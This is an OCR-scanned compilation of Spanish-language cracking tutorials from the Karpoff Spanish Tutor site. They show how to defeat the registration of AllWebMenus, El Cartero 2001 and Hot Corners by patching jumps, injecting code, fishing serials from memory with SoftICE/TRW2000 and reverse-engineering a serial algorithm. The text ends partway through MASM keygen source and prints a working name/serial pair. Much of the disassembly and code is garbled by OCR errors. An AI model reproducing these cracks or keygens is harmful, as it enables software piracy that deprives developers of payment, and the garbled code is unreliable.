Bueno, una vez visto este pequeñito resumen, se ves más o menos que es lo que se puedría intentar cambiar aquí para que 
nos registre el programa, no?, y es ese salto primero que nos mandría a la zona de chico bueno. Pués nada, lo cambiamos el 
je a ¡ne para que salte si la clave no es la correcta (creo que sería más fácil acertar la clave incorrecta que la correcta, 
verdad?), ya sabeis, se busca el desplazamiento con el W32Dasm y con el editor hexadecimal, en este caso, cambiar un 84 
por un 85). Volvemos a probar ahora. Metemos la clave que nos da la gana y que es lo que nos sale?... 


Registration Completed 


3) 


¡Mirad, nos da las gracias y todo!, pero que bueno es el infeliz. Muy bien, aparentemente todo ha salido de puta madre (jeje, 
yo ya sé que no es así), pero cuando por ejemplo nos metemos en el menú Help y picamos en About nos damos cuenta de 
que ahí sigue poniendo: This is an Unregistered Copy, ¡jur!, ¿pero si nos ha dado las gracias y todo?, ¿que habrá pasado?. 

volvemos a registrarnos (ya tenemos el salto cambiado), nos sigue dando las gracias, pero la cosa sigue sin funcionar. Bueno, 
esto es uno de los muchos programas que te demuestran que no basta con cambiar el salto que te lleva a la zona de chico 

bueno. En este caso le hemos metido una clave, que aparentemente es la correcta, pero que en realidad no nos registra, 
simplemente hacemos que nos salga el mensajito de que todo va de muy bien. Pero hay algo más, y fue como el plan B una 
vez fallado el plan A. ¿Os acordais de la referencia a una cadena pwd que vimos en el código anterior? (mirad otra vez si no 
os acordais), pues investigué eso un poquito a ver si me podría dar una pista. Resulta que aparecía más de una vez en el 
código desensamblado. ¿pero que era eso?... 


Bueno, la experiencia con otros programas del mismo tipo me hizo intentar observarlo con el programa RegMonitor con el 

cual podemos ver los movimientos que existen en el registro de Windows mientras estamos corriendo programas. Una vez 

arrancado RegMon ejecutamos el programa y observamos las entradas de registro que este toca, mirad la sorpresa que me 
llevé: 


Registry Monitor - Versión en español compilada por Demi... MIE 


Allwebme Query alueE x HKCU' Software B and BA Program Settings 4lMwebMenus!Settinas+ Main 
CloseKey HKCUSoftwareWWB and YBA, Program Settings Allu'ebMenust5eltings 
DpenkKey HKCUSoftwareWWB and WBA Program Settingst4llwebMenus! Settings 
QueryValueE x HKCUNSoftwareWWB and YBA, Program Settings 4lhMebMenus! Settings pid 
Query alueEx HKCUN Software YB and WBA Program Settings. 4 llw'ebMenust5ettingspid 
QueryW'alueE x HKCUNSoftwareWWB and WBA Program Settingsv4llebMenust5ettingsrpid 
ClosekKey HKCUNSoftwareWWB and YBA, Program Settings tAllw'ebMenus!5ettings 
DpenKey HKCUA Software WWB and YBA, Program Settings AllwebMenus! Settings 
Query alueEx HKCUN Software YB and YBA Program Settings. 4 /lM'ebimMenus,Settingspwd 
QueryW'alueE x HKCUtSoftwareWWB and WBA Program Settings vá llwebimMenustSettings*pud 
QueryValueE x HKCUSoftwareWWB and WBA Program SettingstállwebMenus! Settings puwd 
ClosekKey HKCUNSoftwareWWB and YBA Program Settings tAllwebMenus! Settings 
DpenkKey HKCUtSoftwareWWB and WBA Program Settings 4llw'ebhmMenust Settings 

Allwebme  QuerYalueE x HKCUASoftwareWWB and VBA Program SettingstAlWebMenusiSettingstamms 


| ¿Veis?, pwd es un valor que nos encontarmos en el registro. Picamos dos veces en anguna línea de estas para que nos lleve 
a esta dirección en el registro y ahí podemos ver muchos valores, parámetros, etc... que utiliza el programa para funcionar. El 
| valor pwd tiene como información la clave que le metimos y se tragó por to la cara. Hay otra que me llama mucho la atención 
y es pid que tiene el 1D del software. Parece que ya tenemos una pista más o menos clara de lo que sucede aquí. 
Posiblemente a alguno ya se le ha ocurrido algo ¿verdad?. Nosotros cuando le metimos la clave, se la tragó, y la grabó en el 
registro, pero una vez que intentamos ver si estamos registrados o no, nos dice que nanai de la china, y ¿por que? porque 
esa no es la verdadera clave, porque cuando intenta ver si estamos registrados o no, de alguna manera vuelve a mirar en el 
registro, genera la verdadera clave y la compara con esta que tenemos aquí, y claro no es la buena. Eso fue fácil deducirlo 
cuando arranqué el programa, me metí en el menu Help y pique en About, y todo esto con RegMon cargado. Pasó que volvía 
| amirar los valores de PID y PWD. Pues entonces ya está, aunque se trage las claves que le metamos eso no nos sirve de 
nada, pues siempre mirará en el registro y pillará la clave de ahí. pid posiblemente lo utilice para generar la clave clave 
| correcta, pues cada vez que va a comparar le mete mano en el registro. ¿Y ahora qué?, pués lo que a mi se me ocurrió fue lo 
siguiente: ya sabemos como trabaja, es decir, tanto cuando arranca, como cuando se mira en About y en otras funciones 
más del programa, este genera internamente la clave, luego le mete mano a la que se supone que hay guardada en el 
registro, y las compara de alguna manera, pues entonces por que no probar la función __VBASTRCMP, que utiliza Visual 
Basic para comparar cadenas?, recordad que el programa está hecho en Visual Basic 6. Probemos a poner un punto de 
ruptura en dicha función y sacar de nuevo la ventanita de About. Para ello debemos de tener arrancado Soft-lce y meternos 
| dentro con CTRL+D, poner: bpx __ vbastrcmp y pulsamos intro, luego F5 para seguir, y entonces sacamos la ventanita. 
¡Plass! el sice revienta como era de esperar. Una vez dentro, intenté mirar en las direcciones que indicaban los registros, para 
ver si por casualidad veia la clave correcta, tenía que estar por ahí. La primera vez sólo vi mi clave, y digo la primera vez por 
que saltó varias veces en dicha función, concretamente 3 veces. Una cosa importante, esto sucede cuando tienes un pwd en 
| el registro, si no lo tienes sólo saltará 1 vez (todo esto lo probé). Pués eso, me lie a mirar las direcciones a donde aputaban 
los registros y entonces es cuando pezqué la clave correcta paseándose por la memoria. No había más que verla para darse 
cuenta de que se trataba de una clave: CCU-94H-] 6É, ¡joder no me digais que no tiene to la pinta!. Siempre que veais cosas 
así os la apuntais y la probais a ver si furula. Pues ya está, la probé y furuló a las mil maravillas. Ahora en About aparecía: 
Registered Copy, ya estaba realmente registrado el programa. 


RETOMANDO EL TUTORIAL 


Llegado este punto habría terminado el tutorial, sino fuese por que acabo de leer uno sobre WinZip, escrito por CKENER, y 
que me ha dado una idea estupenda para este programa. Fijaos, a CKENER se le ocurrió redirigir en cierto modo la dirección 
del mensaje de error de forma que en vez de sacar dicho mensaje, sacase la clave correcta. ¿Os dais cuenta?, es como 
| crearse el KeyGen pero utilizando el propio código del programa (para que implementarlo si ya viene en dicho programiilla, 
| jeje). Bueno, pues yo más o menos intenté hacer lo mismo, pero no sabía como pasarle a la función RTCMSGBOX la dirección 
| del código correcto, lo intenté, pero es que realmente cuando estudié la forma en que pasaba el mensaje de error, cambié la 
| dirección para que saliese la clave, pero salía el mensajito en blanco. Bueno, en resumidas cuentas, que tuve problemas para 
hacer esto mismo con esta función de Visual Basic, asi que se me ocurrió otra cosa, quizas más rápida aún. ¿Recordais que 
| cuando le cambiábamos ese saltopara llevarnos a la zona de chico bueno, nos grababa la clave que le habíamos metido en el 
registro, aunque fuese la errónea?, bueno, pués lo que vamos a hace es que en vez de que nos grabe la chorra de password, 
| nos meta diréctamente la pass correcta, de esta manera nosotros mismos hacemos que nos registre con la clave correcta que 
pezcamos (nosotros se la quitamos y luego se la vendemos, jeje). ¿Y como hacemos eso?, pués lo primero de todo es 
estudiar la forma en que graba el código en el registro. Veamos este trozo de programa desensamblado: 


|* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

| |:005475EE(C) 

1 

| :00547602 8B4DE4 mov ecx, dword ptr [ebp-1C] <-----en ecx la dirección de nuestra clave pachanguera 
| :00547605 8B55E8 mov edx, dword ptr [ebp-18] <-----la dirección de la cadena "AllVWebMenus" 

| :00547608 51 push ecx <-----pushea nuestra clave 


|* Possible StringData Ref from Code Obj ->"pwd" 


| 
| :00547609 68C84E4100 push 00414EC8 <-----"pwa" 


|* Possible StringData Ref from Code Obj ->"Settings" 


Ñ 
| :0054760E 689C4E4100 push 00414E9C <-----"Setting" 
| :00547613 52 push edx <-----ya sabemos que pushea 


|* Reference To: MSVBVM60.rtcSaveSetting, Ord:02B2h 


Ñ 
| :00547614 FF1508104000 Call dword ptr [00401008] <-----a guardar se ha dicho, jeje 


Pués lo que yo hice fue lo siguiente: Hice un injerto de código utilizando un programa que se llama Topo, programado por 
MrCrimson, vesión 1.2, ¿pero para que ese injerto?, pués muy sencillo, lo que pretendía era mandar como parámetro, en vez 
| 


de mi falsa clave, la clave correcta quenerada internamente, pero había el problema de que la clave era destruida antes de 
llegar aquí y también se perdía la dirección. Luego el injerto de cógido era para guardar la verdadera pass en alguna zona de 
memoria libre que no fuese modificada y luego mandar esa dirección como paramáetro de la función RTCSAVESETTING. Y 
este fue mi código injertado: 


INICIO: 
OS mov cl,b ¡longitud de la clave -> 12 


mov edi,555360 ¡dirección que elegí para guardar la clave buena 
mov esi,[ebp-14] ;aquí tenemos nuestro tesoro 


Sii mov al, [esi] ¡transladamos la pass 


anna mov [edi], al 
inc esi ;incrementamos dos veces por el tema del formato widechar: a us p e x,¿veis? formato VB 


Ahora sólo quedaba pasarle la dirección 555360: en vez de hacer mov ecx,[ebp-1C], hacer mov ecx,555360. Pero cuando lo 

probé la cosa no funcionó del todo, y digo que no funcionó del todo por que sólo guardó la primera letra de la pass correcta. 

¿Que podría pasar?, pues muy sencillo, estudiando el código interno de la llamada RTCSAVESETTING, observé que también 

pasaba un número a un registro, haciéndole un desplazamiento hacia la derecha y convirtiéndolo en otro que coincidía con el 

número de caracteres que tenía la clave, por lo tanto aquí estaba el problema, también tenía que pasar dicho número que se 
encontraba a 4 bytes por debajo de la clave y era 16, que al desplazarlo un bits hacia la derecha se convierte en B que 
equivale a 11. Recordad la clave que obtuvimos al principio CCU-94H-] 6E, tiene 11 caracteres, ¿¿veis?, pues ya está, sólo 

quedaba insertar un poco de más código que hiciera algo como esto: 


INICIO: 


APS mov ecx, 555360 ;esta es la línea modificada dentro del códifo, cambiada por: mov ecx,[ebp-1c] 
aran mov edx,[ebp-18] ;todo lo que sigue no ha sido modificado 
Sao push 00414ec8 


Y se acabó lo que se daba. Ahora, con todos estos cambios, si le metemos cualquier tontería, genera internamente la 
clave correcta (hace la comparación), la pezcamos, la guardamos en un sitio seguro y más tarde la pasamos como 
parámetro en la función que escribe en el registro, y el solito nos registra el programa. 


NOTAS FINALES 


Sólo quería comentar una cosa, y es que seguramente todo esto puede parecer algo engorroso para crackear el programa 
¿verdad?, pero para mi es bastante más divertido, y a la vez educativo, que un simple cambio de salto. El hecho de conseguir 
comprender el código es lo que me hace seguir en este mundillo tan apasionante, por eso no lo dejo en un simple saltito. En 
mi opinión, siempre hay que buscar la manera de crackear un programa, no de la forma más complicada posible como podría 

parecer este caso, sino de aquella de la que puedas aprender más. 


Por último, quiero dedicar este Tutorial a un amigo, Cesalv, quien de un modo indirecto, me inició en este arte del Cracking, y 
bueno, tambien a todos mis profesores, y estos son todo aquél que escribe tutos para las páginas de KFOR y Karpoff 
incluidos ellos mismos, por supuesto. 


CORREO DEL MENDA: auspextGAwanadoo.es 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


El Cartero 2001 


Name / Serial 

Encontrar el serial correcto 

El Cartero es un pequeño programa que se encargara de leer el correo electrónico 
automáticamente cada cierto tiempo que tu le indicarás en la configuración del mismo; 
permite hasta un máximo de 10 cuentas. 


Aficionado. 


http://www.sigeval.com/ec 


TRW2000, W32dasmVB 


ByTESCRK FECHA: 26/11/2001 


INTRODUCCION 


Bueno, pues primero decirles que tal vez esta sea una manera fácil de encontrar un serial, sin 
embargo, tal vez no sea la correcta o tal vez aplique únicamente a este programa en todo caso algo 
que casi nunca falla con algunos programas escritos en Visual Basic es el SmartCheck de Numega, 
para ver su uso pueden ver muchos tutoriales en el apartado para SmartCheck en la sección 
Crackeando de la web de Karpoff. Asimismo pueden consultar el manual de SiLvEr StOrM llamado 
"Crackeando Programas en Visual Basic". Pero mejor pasemos AL ATAKE 


AL ATAKE 


Abramos el programa y vemos una bonita caja de texto con los campos NOMBRE: y CÓDIGO: ingresamos los 
valores que deseemos en mi caso "ByTESCRK" para el campo nombre y para el campo código "19770424", 
hacemos clic en Registrar 


"REGISTRO INCORRECTO" 


Lógico ¿no?, ahora abramos el W32DASM y busquemos la cadena que nos ha devuelto un error cuando 
hemos dado a Registrar, si ya lo hemos encontrado encontraremos lo siguiente 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0043B4AD(C) <= Investigaremos por aquí 


| 

:0043B77B 8D953CFFFFFF lea edx, dword ptr [ebp+FFFFFF3C] 
:0043B781 8D8D7CFFFFFF lea ecx, dword ptr [ebp+FFFFFF7C] 
:0043B787 89BD54FFFFFF mov dword ptr [ebp+FFFFFF54], edi 
:0043B78D 89B54CFFFFFF mov dword ptr [ebp+FFFFFF4C], esi 
:0043B793 89BD64FFFFFF mov dword ptr [ebp+FFFFFF64], edi 
:0043B799 89B55CFFFFFF mov dword ptr [ebp+FFFFFF5C], esi 
:0043B79F 89BD74FFFFFF mov dword ptr [ebp+FFFFFF74], edi 
:0043B7A5 89B56CFFFFFF mov dword ptr [ebp+FFFFFF6C], esi 


* Possible StringData Ref from Code Obj ->"REGISTRO INCORRECTO" 


| 
:0043B7AB C78544FFFFFF50A84100 mov dword ptr [ebp+FFFFFF441, 00414850 <= Aqui caemos 
:0043B7B5 C7853CFFFFFFO8000000 mov dword ptr [ebp+FFFFFF3C], 00000008 


Al ir a 0043B4AD nos encontraremos con este código que no nos dice nada, pero buscaremos más arriba para 
ver si encontramos algo interesante, cómo sabemos y espero que ya se hayan leído el manual de SiLvEr 
StOrM ya sabrán lo que es un __ vbaStrCmp, entonces buscaremos estas cadenas para ver si están cerca. 


* Reference To: MSVBVM60.__ vbaFreeObjList, Ord: 0000h 


| 

:0043B4A2 E8C36AFCFF Call 00401F6A 

:0043B4A7 83C428 add esp, 00000028 

:0043B4AA 6685DB test bx, bx 

:0043B4AD 0F84C8020000 je 0043B77B <= Aqui caemos 
:0043B4B3 8D458BC lea eax, dword ptr [ebp-44] 
:0043B4B6 50 push eax 


De acuerdo ya encontramos las primeras coincidencias sobre ellas y vemos que hay un salto condicional que 
hace referencia desde 0043B424 como la rutina __ vbaStrCmp está abajo quiere decir que o por lo menos así 
lo pienso que debería poner un bpx mejor en 0043B424 para que salte TRW cuando llegue a ese punto. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0043B424(C) <= Vamos a poner un punto de ruptara aqui... 


| 
:0043B437 FF75A8 push [ebp-58] 
:0043B43A FF75A4 push [ebp-5C] 


* Reference To: MSVBVM60.__vbaStrCmp, Ord:0000h 


| 

:0043B43D E8F86AFCFF Call 00401F3A 
:0043B442 FF759C push [ebp-64] 
:0043B445 8BD8 mov ebx, eax 
:0043B447 F7DB neg ebx 

:0043B449 1BDB sbb ebx, ebx 
:0043B44B 688C824100 push 0041828C 
:0043B450 43 inc ebx 

:0043B451 F7DB neg ebx 


* Reference To: MSVBVM60.__vbaStrCmp, Ord:0000h 


| 

:0043B453 E8E26AFCFF Call 00401F3A 
:0043B458 FF75A0 push [ebp-60] 
:0043B45B F7D8 neg eax 


Cargamos el programa en TRW y ponemos el bpx 0043B424, regresamos al programa he ingresamos nuestro 
Nombre y Código y hacemos clic en Registrar y automáticamente salta el TRW aquí... 


0043B424 JNL 0043B437 

0043B426 PUSH DWORD AO 

0043B42B PUSH DWORD 00418278 

0043B430 PUSH EBX 

0043B431 PUSH EAX 

0043B432 CALL MSVBVM60!__ vbaHresultCheckObj 

0043B437 PUSH DWORD [EBP-58] 

0043B43A PUSH DWORD [EBP-5C] 

0043B43D CALL MSVBVM60!__ vbaStrCmp <= Aqui entramos 
0043B442 PUSH DWORD [EBP-64] 


Luego que hemos entrado a la llamada con F8 vamos al salto con F10 


00401F34 JMP NEAR [00401170] 
00401F3A JMP NEAR [004010D4] <= Saltamos 
00401F40 JMP NEAR [0040101C] 


Ya en el salto nos encontraremos con estas otras opciones entramos en 660470E0 que apunta a una rutina en 
el archivo OLEAUT32.dll en donde se hará la comparación del serial bueno y el maloso. 


6602470F RET 

MSVBVM60!__vbaStrCmp 

66024710 PUSH DWORD [ESP+08] 

66024714 PUSH DWORD [ESP+08] 

66024718 PUSH BYTE +00 

6602471A CALL MSVBVM60!__ vbaStrCmp 
6602471F RET 

MSVBVM60!__vbaStrCmp 

66024722 CMP DWORD [ESP+04],BYTE +02 
66024727 JZ NEAR 660470E0 <= No entramos 
6602472D PUSH DWORD 00030001 

66024732 PUSH DWORD [ESP+08] 

66024736 PUSH DWORD [ESP+10] 

6602473A PUSH DWORD [ESP+18] 

6602473E CALL OLEAUT32!VarBstrCmp <= Entramos 
66024744 TEXT EAX,EAX 


Aqui nos encontramos dentro de las entrañas del OLEAUT32 justo en la rutina VarBstrCmp 


7FFO2E2B JMP SHORT 7FFO2E17 
OLEAUT32!VarBstrCmp 
7FFO2E2D PUSH EBP 

7FFO2E2E MOV EBP,ESP 
7FF02E30 PUSH ECX 

7FF02E31 PUSH EBX 

7FF02E32 PUSH ESI 

7FF02E33 MOV ESI,EBP+08 
7FFO2E36 PUSH EDI <= Chequeamos el valor de ESI 
7FF02E37 TEST ESI,ESI 
7FFO2E39 JNZ 7FFO2E87 


Al chequear el valor contenido en ES| con el comando D ES! nos encontramos lo siguiente... será nuestro 
serial, ¡CLARO! ni más ni menos, ¿que por qué está separado?, cómo sé que hoy si ya te leístes el manual de 
SiLvEr StOrM con título "Crackeando Programas en Visual Basic" sé que ya lo comprendes y sabes que es por 
culpa de la rutina MultiByteToWideChar. 


00471A0C 4E 00 4E 00 4E 00 4E 00-2D 00 41 00 30 00 33 00 N.N.N.N.-.A.0.3. 
00471A1C 38 00 2D 00 33 00 41 00-46 00 41 00 2D 00 36 00 8.-.3.A.F.A.-.6. 
00471A2C 33 00 31 00 31 00 00 00-00 00 00 00 CD E5 0D AO 3.1.1....... -0.á 


00471A3C 0C 00 45 00 3C 00 45 00-00 00 00 00 00 00 00 00 ..E.<.E......... 


Luego que hayas ingresado el serial correcto verás que un archivo nuevo llamado reg.ec se ha creado en 
donde encontrarás la información que ingresastes en mi caso me aparece... 


ByTESCRK 
NNNN-A038-3AFA-6311 


NOTA IMPORTANTE: Tienes que localizar por tu propia cuenta el serial correcto, he quitado a propósito los 
primeros cuatro caracteres alfanuméricos, ¿que querías el serial correcto? solo así, ¡no hombre! si no, no 
tiene chiste y sentiría que es por gusto el tiempo dedicado a este tuto, además me sentiría mal pués no 
estaría colaborando a tu desarrollo intelectual en este fino arte del cracking y además recordarte que... 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de 
manera educacional y tambien como diversión, si te ha gustado, este producto por favor 
COMPRALO, algunas veces... los autores merecen su dinero ;o)" 


Saludos a mis buenos amigos Karpoff, Profesor_X, CaoS ReptantE y a todos los crackers hispanohablantes, 
gracias por una vez más has llegado hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRKOiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 1999-2002 


Hot Corners vl1.85 


Name / Serial 


Hacer un Keygen 


Hot Corners permite que usted rapidamente active o desactive su Screen Saver al mover 
el ratón a cualquier esquina de su pantalla. 


Novato. 


http://www. SouthByPC.com 


TRW2000, W32dasm 


ByTESCRK FECHA: 25/11/2001 


INTRODUCCION 


Estas utilerías son muy bonitas, por lo menos a mi me gustan, una de las mejores es SuperCleaner 
(la manera de generar el serial para ese programa es diferente a la de este). 


Este programa lo que hace es como lo detallo en la descripción, vayamos a lo nuestro y empecemos. 


Si quieres más información sobre SuperCleaner verifica el tuto de mi buen amigo 
CaoS ReptantE de nombre "Parches Inteligentes”. 


AL ATAKE 


Primero carguemos el programa y hagamos clic en el botón Enter Registration y en Name: y Code: 
Ingresemos los valores que deseemos, hacemos clic en Ok y nos aparece una MessageBox conteniendo el 
mensaje siguiente 


Sorry, you have entered an incorrect registration code. 


Salgamos y abramos nuestro W32DASM y veamos los References Strings y busquemos la cadena de texto 
anterior y caemos aqui... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004030EF(C) <= Investigamos aqui... 


| 
:00403137 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Hot Corners" 


| 
:00403139 6880B04000 push 0040B080 


* Possible StringData Ref from Data Obj ->"Sorry, you have entered an incorrect " 
->"registration code." 


| 
:0040313E 68F0B24000 push 0040B2F0 
:00403143 56 push esi 


* Reference To: USER32.MessageBoxA, Ord:01C3h 


| 

:00403144 FF1548914000 Call dword ptr [00409148] 
:0040314A B801000000 mov eax, 00000001 
:0040314F 5E pop esi 

:00403150 81C400020000 add esp, 00000200 
:00403156 C21000 ret 0010 


Nos vamos a ir a 004030EF y caemos aquí... 


* Possible Reference to Dialog: DialoglD_006F, CONTROL_ID:03FC, "" 


| 

:004030CF 68FC030000 push 000003FC 

:004030D4 56 push esi 

:004030D5 FFD7 call edi 

:004030D7 8D442408 lea eax, dword ptr [esp+08] 

:004030DB 8D8C2408010000 lea ecx, dword ptr [esp+00000108] 
:004030E2 50 push eax 

:004030E3 51 push ecx 

:004030E4 E857020000 call 00403340 <= Vamos a entrar aqui 
:004030E9 83C408 add esp, 00000008 

:004030EC 84CO0 test al, al 

:004030EE 5F pop edi 

:004030EF 7446 je 00403137 <= Aqui caemos 

:004030F1 8D542404 lea edx, dword ptr [esp+04] 

:004030F5 8D842404010000 lea eax, dword ptr [esp+00000104] 
:004030FC 52 push edx 

:004030FD 50 push eax 


* Possible StringData Ref from Data Obj ->"Softwarel Hot Corners Configuration" 


:00403340 8B4C2404 mov ecx, dword ptr [esp+04] <= Aqui caemos 
:00403344 81EC00010000 sub esp, 00000100 

:0040334A 8D442400 lea eax, dword ptr [esp] 

:0040334E 53 push ebx 

:0040334F 50 push eax 

:00403350 51 push ecx 

:00403351 32DB xor bil, bl 

:00403353 E8A8000000 call 00403400 <= Se genera el serial, entramos... 
:00403358 8B842414010000 mov eax, dword ptr [esp+00000114] 
:0040335F 83C408 add esp, 00000008 

:00403362 8D542404 lea edx, dword ptr [esp+04] 

:00403366 52 push edx <= Se puede ver el serial correcto (d edx) 
:00403367 50 push eax <= Nuestro serial malo (d eax) 


* Reference To: KERNEL32.IstrempA, Ord:0329h <= El serial se compara en el Kernel32, problemas si queremos 


parchar 


| 

:00403368 FF1500914000 Call dword ptr [00409100] 
:0040336E 85C0 test eax, eax 

:00403370 B001 mov al, 01 

:00403372 7402 je 00403376 

:00403374 8AC3 mov al, bl 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00403372(C) 


| 

:00403376 5B pop ebx 

:00403377 81C400010000 add esp, 00000100 
:0040337D C3 ret 


Ahora vayamos a TRW2000 y en el botón Browse seleccionamos el archivo a ejecutar hacemos clic en Load y 
aparece la ventana de depuración, ahora pongamos un punto de ruptura en 00403400, con Ctrl+N nos 
aparece la ventana del programa y se quita la de depuración, ingresamos los valores en Name ByTESCRK y 
Code 19770424 y hacemos clic en Ok, automáticamente nos aparece otra vez la ventana de TRW y empieza 
el traceo... 


:00403400 81EC00010000 sub esp, 00000100 
:00403406 A048DA4000 mov al, byte ptr [0040DA48] 
:0040340B 53 push ebx 

:0040340C 55 push ebp 

:0040340D 56 push esi 


:00403429 AA stosb 
:0040342A 8B9C2414010000 mov ebx, dword ptr [esp+00000114] <= Nuestro nombre 
:00403431 B940000000 mov ecx, 00000040 


:00403446 B86A000000 mov eax, 0000006A <= EAX recibe el valor de 6Ah 
:0040344B 8BF1 mov esi, ecx 

:0040344D 33C9 xor ecx, ecx 

:0040344F 85F6 test esi, esi 

:00403451 7E0C jle 0040345F 

:00403453 0FBE1419 movsx edx, byte ptr [ecx+ebx] <= Extrae letra por letra 
:00403457 41 inc ecx <= Incrementa ECX en 1 

:00403458 3BCE cmp ecx, esi <= Compara la longitud del nombre 
:0040345A 8D0450 lea eax, dword ptr [eax+2*edx] <= EAX = EAX + EDX * 2 
:0040345D 7CF4 j¡l 00403453 <= Si es menor regresa a 00403453 
:0040345F 8B3D98914000 mov edi, dword ptr [00409198] 

:00403465 50 push eax 

:00403466 8D442414 lea eax, dword ptr [esp+14] 

:0040346A 683CB34000 push 0040B33C 

:0040346F 50 push eax 

:00403470 FFD7 call edi <= Agrega un guión a nuestro número ej. NNNN- 
:00403472 83C40C add esp, 0000000C 

:00403475 8D4C2410 lea ecx, dword ptr [esp+10] 

:00403479 51 push ecx 

:0040347A 55 push ebp 

:0040347B FF15E0904000 Call dword ptr [004090E0] 

:00403481 33C0 xor eax, eax 

:00403483 B96A000000 mov ecx, 0000006A <= ECX recibe el valor de 6Ah 
:00403488 85F6 test esi, esi 

:0040348A 7EOF jle 0040349B 

:0040348C 0FBE1418 movsx edx, byte ptr [eax+ebx] <= Extrae letra por letra 
:00403490 40 inc eax <= Incrementa EAX en 1 

:00403491 8D1492 lea edx, dword ptr [edx+4*edx] <= EDX = EDX + EDX * 4 
:00403494 3BC6 cmp eax, esi <= Compara la longitud del nombre 
:00403496 8DOC91 lea ecx, dword ptr [ecx+4*edx] <= ECX = ECX + EDX * 4 
:00403499 7CF1 jl 0O040348C <= Si es menor regresa a 0040348C 
:0040349B 51 push ecx 

:0040349C 8D442414 lea eax, dword ptr [esp+14] 

:004034A0 683CB34000 push 0040B33C 

:004034A5 50 push eax 

:004034A6 FFD7 call edi <= Agrega un guión a nuestro número ej. 13046- 
:004034A8 83C40C add esp, 0000000C 


:004034AB 8D4C2410 lea ecx, dword ptr [esp+10] 

:004034AF 51 push ecx 

:004034B0 55 push ebp 

:004034B1 FF15E0904000 Call dword ptr [004090E0] <= Concatena los valores ej. NNNN-13046- 
:004034B7 OFBE441EFF movsx eax, byte ptr [esi+ebx-01] <= Extrae la última letra, en mi caso K 
:004034BC 8D1480 lea edx, dword ptr [eax+4*eax] <= EDX = EAX + EAX * 4 

:004034BF 8D0450 lea eax, dword ptr [eax+2*edx] <= EAX = EAX + EDX * 2 

:004034C2 8D542410 lea edx, dword ptr [esp+10] <= EDX recupera el valor 13046- 

:004034C6 8D4C0001 lea ecx, dword ptr [eax+eax+01] <= ECX = EAX + EAX + O1 

:004034CA 51 push ecx 

:004034CB 683CB34000 push 0040B33C 

:004034D0 52 push edx 

:004034D1 FFD7 call edi <= Agrega un guión a nuestro número ej. 1651- 

:004034D3 83C40C add esp, 0000000C 

:004034D6 8D442410 lea eax, dword ptr [esp+10] 

:004034DA 50 push eax 

:004034DB 55 push ebp 

:004034DC FF15E0904000 Call dword ptr [004090E0] <= Concatena los valores ej. NNNN-13046-1651- 
:004034E2 OFBE4C1EFF movsx ecx, byte ptr [esi+ebx-01] <= Extrae la última letra 

:004034E7 8D442410 lea eax, dword ptr [esp+10] <= EAX recupera el valor 1651- 

:004034EB 8D148D1D000000 lea edx, dword ptr [4*ecx+0000001D] <= EDX = ECX * 4 + 1Dh 
:004034F2 52 push edx 

:004034F3 6838B34000 push 0040B338 

:004034F8 50 push eax 

:004034F9 FFD7 call edi 

:004034FB 83C40C add esp, 0000000C 

:004034FE 8D4C2410 lea ecx, dword ptr [esp+10] 

:00403502 51 push ecx 

:00403503 55 push ebp 

:00403504 FF15E0904000 Call dword ptr [004090E0] <= Concatena los valores NNNN-13046-1651-329 
:0040350A 5F pop edi 

:0040350B 5E pop esi 

:0040350C 5D pop ebp 

:0040350D 5B pop ebx 

:0040350E 81C400010000 add esp, 00000100 

:00403514 C3 ret 


la) A A 


Nombre 
| ByTESCRK 
Serial 


| NNNN-13046-1651-329 


ww, SouthByPC.corm 


Y aqui tienen el código fuente en MASM... 


.386 
.model flat,stdcall 
option casemap: none 


include c:1masm321includelwindows.inc 
include c:1masm32Vincludeluser32.inc 
include c:1masm32Vincludel kernel32.inc 
includelib c:1masm321libluser32.!lib 
includelib c:1masm321liblkernel32.lib 


.const 


IDD_DIALOG EQU 1000 
IDC_NAME EQU 1001 
IDC_ SERIAL EQU 1002 
IDC_GEN EQU 1003 
IDC_ COPY EQU 1004 


DigFunc PROTO : DWORD,: DWORD,: DWORD,: DWORD 
Operacion PROTO 

Decimal PROTO 

Clipo PROTO hWnd: HWND 


.data 


nombre db 64 dup(0),0 

serial db 8 dup(0),0 

nada db 20 dup(0),0 

Icono db "keygen",0 
Iconimage db "keygen",0 
minombre db "ByTESCRK",0 
titulo db "Hot Corners v1.85",0 
copiado db "¡El serial ha sido copiado al portapapeles!",0 
hiInstance dd O 

hicon dd O 

buff db 256 dup(?) 

hWnd HWND ? 


.code 
start: 


invoke GetModuleHandle, NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance,I|DD_DIALOG,NULL,addr DlgFunc, NULL 
invoke ExitProcess, NULL 


DigFunc proc hDlg: DWORD,uMsg: DWORD, wParam: DWORD, IParam: DWORD 


ff uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd,eax 
invoke Loadlcon,hInstance,addr Icono 
mov hlcon,eax 
invoke SendMessage, hDlg, WM_SETICON,1,hlcon 
invoke SetDlgltemText,hDlg,I|DC_NAME,ADDR minombre 
.elseif uUMsg==WM_CLOSE 
invoke EndDialog,hDlg, NULL 
.elseif uUMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
If dx==BN_CLICKED 
Ifax==|DC_COPY 
invoke Clipo,hDlg 
.elseif ax==IDC_GEN 
invoke GetDlgltemText,hDlg,I|DC_NAME,ADDR nombre, 64 


invoke Operacion 


.lfeax!=1 
invoke SetDlgltemText, hDlg,IDC_SERIAL,ADDR serial 
